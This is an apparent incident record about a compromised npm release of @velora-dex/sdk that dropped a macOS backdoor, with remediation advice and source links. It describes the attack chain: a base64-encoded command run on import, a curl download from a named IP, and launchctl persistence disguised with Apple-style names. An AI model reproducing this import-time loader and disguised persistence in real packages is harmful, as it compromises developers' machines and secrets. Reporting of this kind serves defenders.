VeloraDEX SDK installed macOS backdoor

On April 7, 2026, an attacker pushed a malicious release of @velora-dex/sdk, the JavaScript toolkit used to integrate with the VeloraDEX decentralized exchange, directly to npm without ever touching the corresponding GitHub repository. The compromised version, 9.4.1, was a registry-only attack: developers reviewing the project's default branch would have seen nothing wrong.

Aikido researcher Charlie Eriksen reported the package on the project's GitHub tracker, and StepSecurity published a teardown. The diff in the tarball was small. package.json carried the version bump, and dist/index.js gained three prepended lines that base64-decoded a shell command and ran it through child_process.exec() as soon as application code imported the SDK. The command used curl to pull install.sh from 89.36.224.5, suppressing all output.

On macOS, the script created ~/Library/Application Support/com.apple.Terminal/, fetched either an ARM64 or Intel build of a binary named profiler from the same host, made it executable, and registered it as a persistent user service through launchctl submit -l zsh.profiler. The naming borrowed from Apple's own bundle conventions to blend into a developer laptop.

The trigger here was not an npm lifecycle hook. Passing --ignore-scripts, a common defense against malicious postinstall payloads, did nothing, because the malicious code ran at require('@velora-dex/sdk') time. StepSecurity told downstream operators to pin to 9.4.0 or earlier, remove the launchctl service and the dropped binary, and rotate any secret reachable from an affected machine.

Motive

Backdoor

Cause

Compromised Account Credentials

Transitive

Yes

• @velora-dex/sdk Compromised on npm: Malicious Version Drops macOS Backdoor via launchctl Persistencestepsecurity.io
• SDK 9.4.1 compromised on npmgithub.com